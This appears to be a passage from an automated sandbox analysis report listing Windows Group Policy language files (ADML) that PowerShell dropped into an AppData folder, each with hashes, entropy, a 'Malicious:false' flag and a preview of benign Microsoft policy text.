                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Server 2008 base categories and supported component definitions</displayName>.. <description>This file contains all the base categories and supported component definitions used by server components.</description>.... <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsServer2008">At least Windows Server 2008</string>.. <string id="SUPPORTED_WindowsServer2003R2">At least Windows Server 2003 R2</string>.. <string id="ServerComponents">Server Components</string>.. <string id="ServerComponents_Help">Contains settings for server operating system components.</string>.. </stringTable>.. </resources>..</policyDefinitionR

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsUpdate.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (561), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):34731
                                                                                                                                                                                                        Entropy (8bit):4.71530009460394
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:xtl2CSosXR2nMZIvHWRzwjxqDx6rUtuLTaUL4wl2bux0AcY5Bnn6aaF8MSaUVNKl:xtlwhQMZI/W5w8t6rjxXcYXnhaa3Tu
                                                                                                                                                                                                        MD5:1B4DF1C94FAE81C341ABEA40C9ADAD9C
                                                                                                                                                                                                        SHA1:7DBDE04EFAF2D6B703417CC6FB0B146D6FD4214F
                                                                                                                                                                                                        SHA-256:2AEC8DCD9608B57D3D65321B399FAA530552027F0E3CA814F477816DF803E201
                                                                                                                                                                                                        SHA-512:4CFCE39BA34EE283EEC89900AFCA583AE9C0AE86CAA3EE8EC90891347825AF81DD82BD08960551852C6B7C8FD77B5ECDE9BA75C16A3986B7663CB494E3C6E30A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->.. .. Note that white space is preserved as is in the text shown in the Group Policy UI... Don't add extra line breaks at the beginning and end of text strings,.. and make sure that lines of text start in the FIRST column... -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WU_SUPPORTED_Windows7ToXPSP2">Windows 7, Windows Server 2008 R2, Windows Vista, Windows XP SP2</string>.. <string id="WU_SUPPORTED_Windows7_To_Win2kSP3_Or_XPSP1">Windows 7, Windows Server 2008 R2, Windows Vista, Windows Server 2003, Windows XP SP2, Windows XP SP1 , Windows 2000

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Winsrv.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (336), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1453
                                                                                                                                                                                                        Entropy (8bit):4.91354096133356
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yQ2X/L2jnwwvXzAd7l4d7FFV:cgeD5x8gm8fKj2T27NmEFV
                                                                                                                                                                                                        MD5:76D4B8899387BCD0C081D4301E1B18DE
                                                                                                                                                                                                        SHA1:EBC1DD18A8893ED391379021941451D89692CDCD
                                                                                                                                                                                                        SHA-256:41331BF31C4BA79B1FF7169EFA27CF37AEE5ED269C1C6894AF78F3F6FB40AE59
                                                                                                                                                                                                        SHA-512:629E37A4E24C60A3E34795F17A5E132DBDAEF40F43AF01B451F6024A4FFC93D36F0381B0B413CE2374778C9D50326345BF0B460D7CCD8F8B5CB1A747CD66F1FF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowBlockingAppsAtShutdown">Turn off automatic termination of applications that block or cancel shutdown</string>.. <string id="AllowBlockingAppsAtShutdown_Explain">This policy setting specifies whether Windows will allow console applications and GUI applications without visible top-level windows to block or cancel shutdown. By default, such applications are automatically terminated if they attempt to cancel shutdown or block it indefinitely.....If you enable this setting, console applications or GUI applicat

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WordWheel.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2619
                                                                                                                                                                                                        Entropy (8bit):4.83283675002977
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKEupdt44XktQFqMQFbC1RARWJUudgJjT5YMcxL5oV:LeD5pmBhIQwMQE1E5Pk9oV
                                                                                                                                                                                                        MD5:A5FE2005E14E5E7E8792CE0C2BDF53A8
                                                                                                                                                                                                        SHA1:D4EE1B57FE5C5387E241B51F6209DDD45A6D5BE4
                                                                                                                                                                                                        SHA-256:8CB5F08BC1D73EE9C83EF7043A8BDA0CF250E7BEDD1C84E700E6A8A913BEAF86
                                                                                                                                                                                                        SHA-512:332BF547D8883DF20AA82D2C6F9E3DCD89E2997EC16436A377F6135DF1136B595A9B91EB91C70BD3068F71EBA72007C4DAE32D3B0584A5FB392A9158A57036B7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CustomSearch">Custom Instant Search Internet search provider</string>.. <string id="CustomSearch_Explain">Set up the menu name and URL for the custom Internet search provider.....If you enable this setting, the specified menu name and URL will be used for Internet searches.....If you disable or not configure this setting, the default Internet search provider will be used.</string>.. <string id="NoSearchInternetInWordWheel">Hide the "Search the Internet" link from the Search box drop down.</string>..

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WorkFolders-Client.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (591), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3464
                                                                                                                                                                                                        Entropy (8bit):4.792120480185555
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cmD5x8gm8fK9186+SciILEl1h8gCgU+7AJcih/qAUJhbWEPIV:PD5pmh186+Sc8h8XrJcEQJxWEPIV
                                                                                                                                                                                                        MD5:F6075FA597F6343205F02CFAF7CF87A7
                                                                                                                                                                                                        SHA1:7A1F11393676AF8A2B8C95EEDE05007A6F2DB31E
                                                                                                                                                                                                        SHA-256:B6A4F7EBE7A44F81B7A5D4C7A38FEA3FCFCD184FA16E46863C1535323197BE1A
                                                                                                                                                                                                        SHA-512:40358DE36BFC342FE314B6FADACA3B1523BB05658F792F1306FC0E4334E50CADD55777069F59E0483C77A5D13C07293909F4BD2596757EF7B2D3504D37522A9A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2012 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_WorkFolders">Work Folders</string>.. <string id="Pol_MachineEnableWorkFolders">Force automatic setup for all users</string>.. <string id="Pol_MachineEnableWorkFolders_Help">This policy setting specifies whether Work Folders should be set up automatically for all users of the affected computer... ..If you enable this policy setting, Work Folders will be set up automatically for all users of the affected computer. This prevents users from choosing not to use Work Folders on the computer; it also pr

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WorkplaceJoin.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1317
                                                                                                                                                                                                        Entropy (8bit):5.059573414260519
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2d1D5eo8gWt4+3FGxiKRI/LeVQLhqeS1FLiRj/eRBAlA5TtT849eLaa6rTM7ijFV:c1D5x8gmjKhGLJ8uwdxPkOr1jFV
                                                                                                                                                                                                        MD5:68E7E1BEE13094C1C0F9896F82B4D741
                                                                                                                                                                                                        SHA1:5D7F87C220EA3EB57322C9FC0986B2EFCAEBB01A
                                                                                                                                                                                                        SHA-256:4754F8A9B020216A0F9CA4C7357A6794D3C98735D9B7857FCBC19ED1401021E3
                                                                                                                                                                                                        SHA-512:6CCD89B24AC4D9232D45A91E3002F69230BA38A878057ABC0A0BD07F3B7A44CC9E97BE29267CBB56C9D3304EC9CA75C3E662DA1D2E154F3155A029F30C6ACF91
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2013 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Automatically workplace join client computers</displayName>.. <description>This setting lets you configure how domain-joined client computers become workplace-joined with domain users in your organization.</description>.. <resources>.. <stringTable>.. <string id="WJ_WorkplaceJoinCategory">Workplace Join</string>.. <string id="WJ_AutoJoinExplain">This setting lets you configure how domain joined client computers become workplace joined with domain users at your organization.....If this setting is enabled, domain-joined client computers will automatically become workplace-joined upon domain user logon.....Note: Additional requirements may appl

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\fthsvc.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1812
                                                                                                                                                                                                        Entropy (8bit):4.867263783263397
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKe92tf3bDtMsabsl5/n0BshFV:LeD5pmk2tf/Ojbg1nCshFV
                                                                                                                                                                                                        MD5:418D7AC091847AB77D095C57FA41A684
                                                                                                                                                                                                        SHA1:3344D9A7DF3250DC67E0AE77A3852504B57FD45D
                                                                                                                                                                                                        SHA-256:1264F3A19797D8DAEE79006048CF0430FC85D1FA8AAC8C64C5A60351C7753901
                                                                                                                                                                                                        SHA-512:86C39CFFAC76B5417780116DCD6E264C05939C52D7E8920330FABC657AFC34EE9EC0C09EDB871B9F6B3E9C75CD1E12029B29DF6A8D12CB24A8D3810D71BDB8D2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Fault Tolerant Heap</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting permits or prohibits the Diagnostic Policy Service (DPS) from automatically resolving any heap corruption problems.....If you enable this policy setting, the DPS detects, troubleshoots, and attempts to resolve automatically any heap corruption problems.....If you disable this policy setting, Windows cann

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\hotspotauth.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1509
                                                                                                                                                                                                        Entropy (8bit):4.960947634536891
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2ddD5eo8gWt4+3FWDELiHkM7QQhsrPKkoXWmWUD64WPb1KOFV:cdD5x8gmID1q+kkb967Pb0OFV
                                                                                                                                                                                                        MD5:C8F213BDF5B362440A28D5D5FDD86FB8
                                                                                                                                                                                                        SHA1:587A99FD8725FBBEF863D8D01D3993123817A8B3
                                                                                                                                                                                                        SHA-256:8A6601421A6DE212B6B1FF4990ED462251F3C4C75CB37D7BBA0AFC814B0C50F1
                                                                                                                                                                                                        SHA-512:966BE4DBF177B42253853A03B08447B48315FF51CF05C9FA88FA2A5A344CC9E02A357D7A7FAF61A831EDA39FA9AF35B88389FB8EAFE6BA72A8D7F8BCE90EFFB1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Hotspot Authentication Group Policy Settings</displayName>.. <description>Hotspot Authentication Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="HotspotAuth_Category">Hotspot Authentication</string>.. <string id="HotspotAuth_Enable">Enable Hotspot Authentication</string>.. <string id="HotspotAuth_Enable_Help">This policy setting defines whether Wi-Fi hotspots are probed for Wireless Internet Service Provider roaming (WISPr) protocol support.....If a Wi-Fi hotspot supports the WISPr protocol, users can submit credentials when manually connecting to the network. If authentication is successful, users will b

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\iSCSI.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (402), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5220
                                                                                                                                                                                                        Entropy (8bit):4.806973059665715
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmCaYOcq03f1QSxMMdeuRr48/TNZvOfxk5DxKhFwfDFpm8h7w1D7zDGFV:EPaYO503f1QSy+euRD/TNZvOfxk5DxKQ
                                                                                                                                                                                                        MD5:FE14E28C69993ACCEC221BE3C7A99E5C
                                                                                                                                                                                                        SHA1:AF4A9B9485D3CAE6BB21DC2932A705247C20EC01
                                                                                                                                                                                                        SHA-256:68B3DF1ED58900E693440D614266C2F8FA20A87F75B9183A5BEBFAB5C3C6B4C2
                                                                                                                                                                                                        SHA-512:B60557A69068D7F37CE89C724D22340E464E4DFDE039E9E4A10BE2F4458C165456872632D886EADBAA7AC72F23DAB8AF32EC1A1DAE2605EDC7D25004E878772B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="iSCSI_Category">iSCSI</string>.. <string id="iSCSIDiscovery_Category">iSCSI Target Discovery</string>.. <string id="iSCSIDiscovery_ConfigureiSNSServers">Do not allow manual configuration of iSNS servers</string>.. <string id="iSCSIDiscovery_ConfigureiSNSServers_Help">If enabled then new iSNS servers may not be added and thus new targets discovered via those iSNS servers; existing iSNS servers may not be removed. If disabled then new iSNS servers may be added and thus new targets discovered via those

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\msched.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3422
                                                                                                                                                                                                        Entropy (8bit):4.718448996775859
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3F+uAuj9hjwJd+ktkEbEqXf3XYonvxbBN9vBxWQcjtrh6kWR0z:cgeD5x8gmVSTuiv3Xv1IQcLzWElq2SIV
                                                                                                                                                                                                        MD5:224BEABEB0B0C06F17CD758D7F5CA442
                                                                                                                                                                                                        SHA1:5D6443E03F0345B93561D2958C725E963CE1EBCD
                                                                                                                                                                                                        SHA-256:C65DA0DF5066F72EFF8B61EDF4F7B900650462FE38260C98C43A2DFCBEEF8634
                                                                                                                                                                                                        SHA-512:17AD214FA68E221F9805472AB453B13477656AC0F7A1612F2260B369F2F1E33D0DCC2E03851A3CB72999F16EF790B56F2CC0E1C341723FD1BB0C6937FEA1B98D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Maintenance Scheduler Policies</displayName>.. <description>Maintenance Scheduler Group Policies</description>.. <resources>.. <stringTable>.. <string id="MaintenanceScheduler">Maintenance Scheduler</string>.. <string id="ActivationBoundary">Automatic Maintenance Activation Boundary</string>.. <string id="ActivationBoundaryHelp">.. This policy setting allows you to configure Automatic Maintenance activation boundary..... The maintenance activation boundary is the daily schduled time at which Automatic Maintenance starts.... If you enable this policy setting, this will override the default daily scheduled time

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\nca.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (532), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8481
                                                                                                                                                                                                        Entropy (8bit):4.839330009877803
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:xvEwDvJfTqcK3KoGmwrtrqGryq5hP8lv5UNgTe:xvE8fWVQpHOq5hP8vuge
                                                                                                                                                                                                        MD5:913C464CFBD79FBB24DDDB6A91D1C375
                                                                                                                                                                                                        SHA1:DE4AB693B5B746695B00E6F00EFC190D7541242F
                                                                                                                                                                                                        SHA-256:6E3E490033E86709BBEAD8A1CA4F35DD478297BD932A76C3D9942DD59F8AC27F
                                                                                                                                                                                                        SHA-512:346C4AA6FBC299ECC94C2CA4970A4EC4867235FD9268E4E89C2F32D526A1F75824565442B555080CD374C229D6C5ECFD2CF6B7B96DC85FCABD14F9225FE05CEB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<policyDefinitionResources revision="1.0" schemaVersion="1.0">.. <displayName>DirectAccess Client Experience Settings Group Policy Template</displayName>.. <description>This admx file describes policy template for DirectAccess Client NCA component</description>.. <resources>.. <stringTable>.. <string id="NCA">DirectAccess Client Experience Settings</string>.. <string id="NCA_Help">This is the group policy template for DirectAccess Client Experience Settings. Please read the DirectAccess deployment guide for more information.</string>.. <string id="SupportEmail">Support Email Address</string>.. <string id="SupportEmail_Help">Specifies the e-mail address to be used when sending the log files that are generated by NCA to the network administrator. ....When the user sends the log files to the Administrator, NCA uses the default e-mail client to open a new message with the support email address in the To: field of the message, then attaches the generated log files

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\pca.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (379), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6236
                                                                                                                                                                                                        Entropy (8bit):4.8210465928673445
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm0ybro3NXRz6/LPrwwfsHO+/7Oaj3V:EDyXo3NXRz+0w0HdjtjF
                                                                                                                                                                                                        MD5:78021A8DEB0981DD65154025032BB7D5
                                                                                                                                                                                                        SHA1:5B59F46A232E9752D6405949564B435D1AD709B5
                                                                                                                                                                                                        SHA-256:899C5FF462E34E8319AC0C59A9BC794695166970BA28495C473754FA5C3DE457
                                                                                                                                                                                                        SHA-512:C4BBA2C6A05B10A74D603225CE69BF6EC3D08CF8039D56E5118774179A628A237F9119C09215C4FEB7BE5D5D06A8E5CF6B07FE2822D0AF7E65FEFD47FA9E039E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>...... Overall category text -->.. <string id="PcaScenarioCategory">Application Compatibility Diagnostics</string>.. .... Generic WDI text -->.. <string id="WdiScenarioExecutionPolicyLevelResolution">Detection, Troubleshooting and Resolution</string>.. <string id="WdiScenarioExecutionPolicyLevelTsOnly">Detection and Troubleshooting Only</string>...... Individual scenario text -->.. <string id="DetectBlockedDriversText">Notify blocked drivers</string>.. <string id="DetectDepre

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\sdiageng.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (423), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3289
                                                                                                                                                                                                        Entropy (8bit):4.684667062227081
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cVD5x8gmnwOx5XzQfO4ZQZr4VdF+kHdqblrmG7FV:WD5pmnwOX4aadF+odcmG7FV
                                                                                                                                                                                                        MD5:145EB767DFAAC5B7D79A9DF8C4FD6504
                                                                                                                                                                                                        SHA1:EF931F6BD052785B77B640F310BB593DA3FBC881
                                                                                                                                                                                                        SHA-256:F2483555C3531D0821703D3696ACBFE5528A031D762661249CD6DF8434ACCFC3
                                                                                                                                                                                                        SHA-512:8B5AC9ABF5870C9F2D9708E8858121815CE875E379700E7E4797F84631802D82FFE0A32C1983CF23BD6B09D775965F0192939D03CAC6F1E5FD2B54CC55EE2602
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Scripted Diagnostics</displayName>.. <description>Scripted Diagnostics</description>.. <resources>.. <stringTable>.. <string id="ScriptedDiagnosticsCategory">Scripted Diagnostics</string>.. <string id="ScriptedDiagnosticsSecurityPolicy">Configure Security Policy for Scripted Diagnostics</string>.. <string id="ScriptedDiagnosticsSecurityPolicyExplain">This policy setting determines whether scripted diagnostics will execute diagnostic packages that are signed by untrusted publishers.....If you enable this policy setting, the scripted diagnostics execution engine validates the signer of any diagnostic package and runs only those signed by trust

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\srm-fci.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (472), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7668
                                                                                                                                                                                                        Entropy (8bit):4.73074137043816
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:wNa+/IQexYsInNwFxpeHe+zpoDQzwvU9Q7nwefXvU9Q7HTV:G/In5xpe++zpoDhv8w/v80
                                                                                                                                                                                                        MD5:7B04E3F4356B26D851628246DAC94705
                                                                                                                                                                                                        SHA1:AB5AC1954A3652BCB12946B607C2B1F4D876DA21
                                                                                                                                                                                                        SHA-256:E6F4193F29666226D72365C364E473F1F9DEB47405DFEDCA38A215EB61FFF967
                                                                                                                                                                                                        SHA-512:E1A0C7A200AEDCD3FB55E64BF67A0EE9EED91C0632C178A54FA98E20D9B4C32680F17900BC66017FEF3F595A6FCA06624B2C0CF7D5B4E8490C177F3AFAC1A414
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>File Classification Infrastructure Group Policy Definitions</displayName>.. <description></description>.. <resources>.. <stringTable>.. <string id="AdrCat">Access-Denied Assistance</string>.. <string id="FciCat">File Classification Infrastructure</string>.. <string id="EnableManualUXDisplay">File Classification Infrastructure: Display Classification tab in File Explorer</string>.. <string id="EnableShellExecuteFileStreamCheck">Enable access-denied assistance on client for all file types</string>.. <string id="EnableShellExecuteFileStreamCheck_Descr">This Group Policy Setting should be set on Windows clients to enable access-denied assistance for all file types</string>.. <string id="EnableManualUXExplain">This policy setting controls whether the Classification

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\tcpip.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (431), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13466
                                                                                                                                                                                                        Entropy (8bit):4.782394839113498
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmjKFPT4fv3EIrv3Iv/g8/vRzZxOkRvhRkKSbHw1cZICCHzBaTBeQqqL7tgA:E6fv3EWv3Ivo8Fn/nYwrqjvigA95Zy/D
                                                                                                                                                                                                        MD5:0B0DA2277FE7B257B26ED87E595CDCF5
                                                                                                                                                                                                        SHA1:5F790C95E1703A243F0678FDF521772811B4D352
                                                                                                                                                                                                        SHA-256:89EC65C0144936DE7A31B903D9A8DBD2E436FD098DE9AA91EAF164A5A8B6DB1B
                                                                                                                                                                                                        SHA-512:581018F7E5E6ACFBB4D7E8B6BDADCA26ABE829ED1E12AAF1B86FB70857DF9B2290056B3890E969A62DA027399FA4624E1B9478679B91632AD1CE12D1A09D0250
                                                                                                                                                                                                        Malicious:false
